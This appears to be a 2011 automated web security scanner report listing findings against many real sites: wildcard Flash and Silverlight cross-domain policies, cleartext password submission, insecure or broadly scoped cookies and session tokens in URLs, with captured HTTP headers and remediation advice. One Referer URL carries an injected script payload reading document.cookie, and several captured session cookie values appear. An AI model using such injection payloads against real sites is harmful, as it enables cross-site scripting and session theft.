Last-Modified: Wed, 11 May 2011 17:56:33 GMT
ETag: "110080-66-4dcacdd1"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Sun, 15 May 2011 13:18:52 GMT
Connection: close
Set-Cookie: 56Q8=CT; expires=Sun, 12-Jun-2011 13:18:52 GMT; path=/; domain=.www.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.odesk.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 13:56:37 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Thu, 12 May 2011 00:05:13 GMT
ETag: "c4-4a308f176c040"
Accept-Ranges: bytes
Content-Length: 196
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.ligatus.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:39 GMT Server: Apache Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT ETag: "2d282ae-71-4902476407200" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: private, max-age=600 Age: 0 Expires: Sun, 15 May 2011 15:50:39 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"315-1288858532000" Last-Modified: Thu, 04 Nov 2010 08:15:32 GMT Content-Type: application/xml Content-Length: 315 Date: Sun, 15 May 2011 15:40:41 GMT Connection: close Server: Apache
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: edge.sharethis.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Fri, 06 May 2011 17:23:38 GMT ETag: "16b43-14a-4a29ec0155a80" Content-Type: application/xml Date: Sun, 15 May 2011 13:59:58 GMT Content-Length: 330 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: feeds.bbci.co.uk
Response
HTTP/1.0 200 OK Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Server: Apache Content-Type: text/xml Cache-Control: max-age=11 Expires: Sun, 15 May 2011 13:56:04 GMT Date: Sun, 15 May 2011 13:55:53 GMT Content-Length: 1081 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 10:46:01 GMT Expires: Mon, 16 May 2011 10:46:01 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 9032 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: hc2.humanclick.com
Response
HTTP/1.1 200 OK Content-Length: 526 Content-Type: text/xml Content-Location: http://hc2.humanclick.com/crossdomain.xml Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT Accept-Ranges: bytes ETag: "076249f5c35c91:da2" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Sun, 15 May 2011 13:56:55 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: newsrss.bbc.co.uk
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=115 Expires: Sun, 15 May 2011 13:57:47 GMT Date: Sun, 15 May 2011 13:55:52 GMT Content-Length: 1081 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
Response
HTTP/1.0 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 14 May 2011 16:59:52 GMT Expires: Sun, 15 May 2011 16:59:52 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 73547 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 03:47:21 GMT Expires: Mon, 16 May 2011 03:47:21 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 34202 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: tvgids.upc.nl
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:40 GMT Server: Apache Last-Modified: Wed, 28 Jul 2010 15:36:40 GMT ETag: "47e004-d2-48c74624ab200" Accept-Ranges: bytes Content-Length: 210 Cache-Control: max-age=5 Expires: Sun, 15 May 2011 15:40:45 GMT Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: w.sharethis.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Fri, 06 May 2011 17:23:38 GMT ETag: "32e87-14a-4a29ec0155a80" Content-Type: application/xml Date: Sun, 15 May 2011 13:59:51 GMT Content-Length: 330 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:14 GMT Server: Apache Last-Modified: Mon, 17 May 2010 11:29:38 GMT ETag: "8a41ec80" Accept-Ranges: bytes Content-Length: 213 Cache-Control: max-age=7200 Expires: Sun, 15 May 2011 15:16:14 GMT Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.upc.nl
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:33 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 11:26:11 GMT ETag: "3e350a-1b1-499b895acbac0" Accept-Ranges: bytes Content-Length: 433 Cache-Control: max-age=5 Expires: Sun, 15 May 2011 15:40:38 GMT Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.youtube.com
Response
HTTP/1.0 200 OK Date: Sun, 15 May 2011 14:06:56 GMT Server: Apache Last-Modified: Fri, 13 May 2011 03:51:08 GMT ETag: "132-4a320373f0300" Accept-Ranges: bytes Content-Length: 306 Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: t.tmimgcdn.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.36 Date: Sun, 15 May 2011 13:56:59 GMT Content-Type: application/xml Connection: close Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT ETag: "3d88165-105-4886fcb83c300" Accept-Ranges: bytes Content-Length: 261 Expires: Wed, 09 May 2012 13:56:59 GMT Cache-Control: max-age=31104000 X-Cache: MISS
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.templatemonster.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sun, 15 May 2011 13:59:36 GMT Content-Type: application/xml Connection: close Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT ETag: "3d88165-105-4886fcb83c300" Accept-Ranges: bytes Content-Length: 261
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Sun, 15 May 2011 13:16:52 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: c.gelifesciences.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:55 GMT Server: Omniture DC/2.0.0 xserver: www74 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: iinet.122.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:32 GMT Server: Omniture DC/2.0.0 xserver: www323 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: j2global.122.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:31 GMT Server: Omniture DC/2.0.0 xserver: www9 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: met1.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:17:02 GMT Server: Omniture DC/2.0.0 xserver: www81 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: upc.d2.sc.omtrdc.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:45 GMT Server: Omniture DC/2.0.0 xserver: www9 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"1167-1291379570000" Last-Modified: Fri, 03 Dec 2010 12:32:50 GMT Content-Type: application/xml Content-Length: 1167 Date: Sun, 15 May 2011 15:40:41 GMT Connection: close Server: Apache
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /passwordrecovery/ HTTP/1.1 Host: secure1.wn.com.au Connection: keep-alive Referer: https://webmail.westnet.com.au/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:21:34 GMT Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=czqop0naxbczvi2xp4s3vx45; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 14817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Westnet - Password Recovery</title> <meta name="Keywords" content="Wes ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta na ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?vid=139237823&eid=49&tid=null&tag=landing&ref=http%3A//www.teleflora.com/ HTTP/1.1 Host: cts-log.channelintelligence.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:48 GMT Server: Jetty(6.1.22) Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: serverstamp=4C33DB3C-A4E9-E1AE-6596-9AA13B00657D;Domain=.channelintelligence.com;Expires=Wed, 12-May-21 13:18:48 GMT Set-Cookie: sessionstamp=E5D27090-A511-99DB-5353-545157305174;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 14:18:48 GMT Cache-Control: private,no-store Content-Length: 42 pragma: no-cache content-type: image/gif X-Powered-By: Mirror Image Internet P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Via: 1.1 dfw061005 (MII-APC/1.6)
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cvtelecom.cv Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=uu217t5m2qripfeaju7esenpd2; path=/; domain=.cvtelecom.cv Last-Modified: Wed, 11 May 2011 18:24:18 GMT ETag: "2c7249aeff48e50d52e963975adf4829" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr"> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oscommerce-manager.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
SESS0684c6974b27be9f5aede608f11c100b=b477739a076f4cf3a3fad936f37a2922; expires=Tue, 07 Jun 2011 17:17:16 GMT; path=/; domain=.servercentral.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pxoxicm?oxid=55c24d3f-420f-e5d1-3d86-830e190a9e3c HTTP/1.1 Host: a.triggit.com Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: trgu=962ff5fc-04a1-4f8a-bd23-abf5347b50b4; domain=.triggit.com; path=/; expires=Sun, 15-May-2016 00:00:00 GMT; Content-Type: image/gif P3P: CP="DEVo PSDo OUR BUS DSP ALL COR" Date: Sun, 15 May 2011 14:06:34 GMT Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
(new Image(0,0)).src='http://ad.doubleclick.net/activity;src=1897549;dcnet=4591;boom=18245;sz=1x1;ord='; (new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=562523&id=390905'; (new Imag ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=684&id=1&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_jXrh="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRYuvuiWxK5heZbiXhLgjogY3epOerrP4/9PQgCTNzSvrP9Y4WriuhDJ8LUH4CyhiygbkI6Qe46QL3ysOTq8CWCjajF58cLZR38/cuDQBah3RSAXQrcuwCKK48DLMBFdbO9047tQyRaTxgKde4Mm03TcBXyOmbzMtUOO6J1FvDTSjZWhE="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Content-Type: application/x-javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 15 May 2011 13:19:34 GMT Content-Length: 541
